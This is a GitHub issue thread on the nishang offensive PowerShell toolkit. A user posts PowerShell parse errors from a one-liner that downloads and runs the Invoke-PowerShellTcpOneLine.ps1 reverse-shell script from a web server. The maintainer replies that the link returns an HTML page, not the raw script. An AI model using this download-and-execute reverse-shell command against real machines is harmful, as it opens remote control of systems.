### ISSUE TITLE
Invoke-PowerShellTcpOneLine.ps1 errors

### ISSUE THREAD

**Issue by expertri** [samratashok/nishang#67]
good day i am new to this and following the proccess i am getting is error on all windows 7 or 8 pcs

PS C:\> powershell "IEX (New-Object Net.WebClient).DownloadString('http://mywebserver/Invoke-PowerShellTcpOneLine.ps1
');"
IEX : At line:147 char:190
+ ... ata-ga-click="(Logged out) Header, go to Features">Features <span cla ...
+                                                                 ~
The '<' operator is reserved for future use.
At line:147 char:261
+ ... ="Bump-link-symbol float-right text-normal text-gray-light">&rarr;</s ...
+                                                                 ~
The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:160 char:251
+ ... ogged out) Header, go to Customer stories">Customer stories <span cla ...
+                                                                 ~
The '<' operator is reserved for future use.
At line:160 char:322
+ ... ="Bump-link-symbol float-right text-normal text-gray-light">&rarr;</s ...
+                                                                 ~
The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:161 char:231
+ ... ata-ga-click="(Logged out) Header, go to Security">Security <span cla ...
+                                                                 ~
The '<' operator is reserved for future use.
At line:161 char:302
+ ... ="Bump-link-symbol float-right text-normal text-gray-light">&rarr;</s ...
+                                                                 ~
The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:181 char:223
+ ... -click="(Logged out) Header, go to Features">Explore GitHub <span cla ...
+                                                                 ~
The '<' operator is reserved for future use.
At line:181 char:294
+ ... ="Bump-link-symbol float-right text-normal text-gray-light">&rarr;</s ...
+                                                                 ~
The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:184 char:102
+ ... light text-normal text-mono f5 mb-2  border-top pt-3">Learn &amp; con ...
+                                                                 ~
The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:217 char:185
+ ... r" data-ga-click="(Logged out) Header, go to Pricing">Plans <span cla ...
+                                                                 ~
The '<' operator is reserved for future use.
Not all parse errors were reported.  Correct the reported errors and try again.
At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString('http://104.248.59.211/ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : RedirectionNotSupported,Microsoft.PowerShell.Commands.InvokeExpressionCommand

has anyone seen this 

thanks

**Comment by samratashok** [comment]
Looks like your download link is no to the raw script but includes some web app headers.
